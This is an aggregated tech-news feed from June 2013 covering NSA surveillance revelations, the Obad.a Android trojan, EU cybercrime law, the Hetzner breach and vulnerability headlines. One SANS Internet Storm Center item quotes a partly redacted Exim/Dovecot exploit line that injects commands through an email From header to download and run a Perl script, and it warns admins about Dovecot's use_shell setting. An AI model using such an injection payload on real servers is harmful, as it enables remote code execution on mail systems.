A top secret NSA program to collect ALL Verizon customers' call data isn't at all surprising
RETIRED: Parallels Plesk Panel Arbitrary PHP Code Injection Vulnerability
Google has denied involvement in a U.S. government surveillance program called Prism since news broke Thursday that the National Security Agency has been accessing the servers of some of the largest Internet companies, but now company executives insist they had never heard of the program.
Microsoft's TechEd North America conference, held this week in New Orleans, provided a first glimpse of the architecture that Microsoft shops should use to manage employee personal devices for work duties.
Buffeted by concerns about the economy and IT spending, tech stocks have gone on a roller coaster ride lately, but on the whole they've managed to hang on to gains they made earlier in the quarter.

Recently discovered malware targeting Android smartphones exploits previously unknown vulnerabilities in the Google operating system and borrows highly advanced functionality more typical of malicious Windows applications, making it the world's most sophisticated Android Trojan, a security researcher said.

The infection, named Backdoor.AndroidOS.Obad.a, isn't very widespread at the moment. The malware gives an idea of the types of smartphone malware that are possible, however, according to Kaspersky Lab expert Roman Unuchek in a blog post published Thursday. Sharply contrasting with mostly rudimentary Android malware circulating today, the highly stealthy Obad.a exploits previously unknown Android bugs, uses Bluetooth and Wi-Fi connections to spread to near-by handsets, and allows attackers to issue malicious commands using standard SMS text messages.

"To conclude this review, we would like to add that Backdoor.AndroidOS.Obad.a looks closer to Windows malware than to other Android trojans, in terms of its complexity and the number of unpublished vulnerabilities it exploits," Unuchek wrote. "This means that the complexity of Android malware programs is growing rapidly alongside their numbers."

Read 6 remaining paragraphs | Comments

Google this week completed an update of its mobile Gmail app, and has adopted a color tile scheme that will look somewhat familiar to Windows 8 users. It also added a dose of frustration for users.
Cisco Systems and Google will give digital-video-recorder pioneer TiVo lump-sum payments totaling US$490 million as part of a deal that will end the companies' litigation over patents for set-top technology.

Happy Hour Hot Links: Week of 6/3
SC Magazine
Always refreshing to see infosec written about in long form. Vanity Fair has a new piece on cyber war, and it contains lots of great color. This is a marketing campaign (from Tripwire) that is very well done. Even with all of the talk around the ...

A newly discovered Trojan program exploits previously unknown flaws in Android and borrows techniques from Windows malware in order to evade detection and achieve persistence on infected devices.

On Thursday, a European Parliament committee approved a new draft directive (PDF) that would, among other things, require European Union member states to step up criminal penalties for hacking, botnets, and other digital malfeasance.

Under EU law, directives are a set of instructions for all 27 (soon to be 28, when Croatia joins on July 1, 2013) member states to “translate” the new rules into their own local law. The new draft directive is set to be voted on by all of Parliament in July 2013 and enter into force shortly thereafter if approved.

According to a press release from the civil liberties committee, the new language requires that maximum prison terms for “illegally accessing or interfering with information systems, illegally interfering with data, illegally intercepting communications or intentionally producing and selling tools used to commit these offences,” be set at least for two years.

Read 5 remaining paragraphs | Comments

Cloud service providers are working with authorized third-party auditors to meet FedRAMP security controls. The 3PAOs tell us how it’s going, so far.
Analyst concerns that Galaxy S4 smartphone sales are lagging sent Samsung's shares down 6% early Friday.
President Barack Obama today forcefully defended the government's data collection activities, calling them vital to protecting the nation against terrorist attacks.
NASA's Mars rover Curiosity is about to head out on a long, arduous trek and scientists expect their best scientific discoveries are to come -- if the rover can avoid getting stuck in sand.
Although the National Security Agency's secretly collecting phone records of millions of Verizon customers may be nothing new, the current scope of the data collection is "breathtaking." Do you think the U.S. government should be allowed to collect phone records and mine Internet data on citizens?
Apple will probably spill the timetable and pricing of the next version of OS X on Monday at WWDC.
Showing off its optical networking prowess, ZTE has completed at test that managed speeds at 400Gbps over a distance of more than 5,000 kilometers, or about 3,100 miles.

One of our readers wrote in to let us know that he had received an attempted Exim/Dovecot exploit attempt against his email server.  The exploit partially looked like this:

From: x`wget${IFS}-O${IFS}/tmp/crew.pl${IFS}50.xx.xx.xx/dc.txt``perl${IFS}/tmp/crew.pl`@blaat.com

(Obviously edited for your safety, and I didn't post the whole thing.)

This is an exploit against Dovecot that is using the feature "use_shell" against itself.  This feature, unfortunately, is found in the example wiki on Dovecot's website, and also in their example configuration.  We'd caution anyone that is using Dovecot to take a look at their configuration and make use they aren't using the "use_shell" parameter.  Or if you are, make darn sure you know what you are doing, and how to defend yourself.

-- Joel Esler | http://blog.joelesler.net | http://twitter.com/joelesler

(c) SANS Internet Storm Center. http://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

Kaspersky Researchers Discover Most Advanced Android Malware Yet
Android Police
Please stop doubting the work of InfoSec engineers by insisting a report exposing some complex malware is to promote the vested interests of an individual security firm. It isn't. This is how the security works (the opposite of "security by obscurity ...

Word's out that Microsoft is poised to reorganize itself as a 'device and services' company. CEO Steve Ballmer has been trying to do this for a decade, but executives disloyal to him--or still loyal to Bill Gates--often got in Ballmer's way. But Redmond's successes, including Azure and Office 365, suggest this culture may finally be changing.
Showing off its optical networking prowess, ZTE has completed at test that managed speeds at 400Gbps over a distance of more than 5,000 kilometers, or about 3,100 miles.

It's February, about an hour after midnight, and three men in oversized clothing and hats walk silently down a deserted residential street in Long Beach, California. Each one goes up to a car in the area, takes out a small electronic device, and pulls on the passenger side car handle. The first man tries a car in the street. It doesn't open, and he walks on. The other two men try an Acura SUV and an Acura sedan in one home's driveway. Both of the cars unlock, their overhead lamps going on. The two men rummage through the cars, taking what they find. They shut the car doors and walk off.

Video of this scene was recorded by a surveillance camera placed in the driveway where the two Acuras were parked. The Long Beach Police (LBPD) department says that eight vehicles in total were “accessed and burglarized” in the same neighborhood that night. But despite having footage of the crime, the LBPD was not able to determine how the electronic devices worked or who the suspects were.

Auto burglary technology grants keyless access.

In April, the Long Beach Police posted the surveillance video on YouTube, desperate to figure out just how the electronic device used by the three suspects works. Ars spoke to a Long Beach Police spokeswoman who confirmed that after another two months, the department still hasn't come to a conclusive answer.

Read 6 remaining paragraphs | Comments

Apple will launch its own iPhone trade-in program this month, exchanging older iPhones for in-store credit, according to Bloomberg and other sources.
Sierra Wireless' latest embedded wireless module connects cars to Verizon's LTE network, underlining growing interest in the 4G technology while also highlighting its current drawbacks.
KDE Plasma Paste Applet Local Password Generation Vulnerability
After remaining quiet on the hardware front for years, Amazon.com's China business has finally brought the company's Kindle tablet and Kindle e-reader to the country.
The FBI and the National Security Agency are tapping directly into servers at Microsoft, Google, Facebook, Skype and other major Internet companies to keep track of the communications and interactions of known and suspected foreign terrorists, the Washington Post reported.
Unknown intruders compromised servers at web hosting company Hetzner and then copied customer data such as password hashes and payment information. Hetzner says that the intruders left behind a previously unknown rootkit

At Google's annual shareholders' meeting, company executives talked about censorship in China, Glass privacy issues and the need to bet big to win big
At Apple's World Wide Developer Conference, which kicks off Monday, everyone's expecting updates for both iOS and OS X. But one of those operating systems is more important than the other.
The Obama administration this week found itself in the middle of a raging controversy after The Guardian broke a story about a massive phone data collection effort by the National Security Agency (NSA). Here's the lowdown on what's going on.
The FBI and the National Security Agency are tapping directly into servers at Microsoft, Google, Facebook, Skype and other major Internet companies to keep track of the communications and interactions of known and suspected foreign terrorists, the Washington Post reported.
On its June Patch Tuesday, Microsoft plans to close critical and important holes in Internet Explorer, Windows and Office. Whether the 0-day hole that was disclosed by Google employee Tavis Ormandy will also be closed remains to be seen

Drupal Services Module Cross Site Request Forgery Vulnerability
Automatic Windows updates, a Windows-8-compatible WinPCap, faster packet byte views, updated toolbars and full Bluetooth protocols and profile support are among the enhancements in the open source network protocol analyser

Infamous hacker KingCope has popped up again, publishing an exploit that supposedly remotely injects PHP code into Plesk servers
MediaWiki Arbitrary File Upload Vulnerability
Global sales of external server storage have dropped for the first time since 2009, according to data from research firm IDC.
New Windows PCs have always been the main attraction at Computex, the annual trade show in Taipei. But notable on the show floor this year is the growing presence of Google's Android OS, which is creeping into more and more tablets, televisions, set-top boxes and even PCs.
A top Intel executive said the power and performance battle with ARM is over, because Intel's upcoming chips based on its Silvermont architecture are ahead on key metrics required to deliver strong performance and battery life on smartphones and tablets.
The U.S. government said late Thursday that it is authorized to collect intelligence information of non-U.S. persons located outside the country, in the wake of news reports on the government's surveillance programs.
The next time a bear hits a car on a Russian highway, the video might be in high definition.
Salesforce.com has hired a key former Oracle executive Keith Block as its president and vice chairman.
Internet Storm Center Infocon Status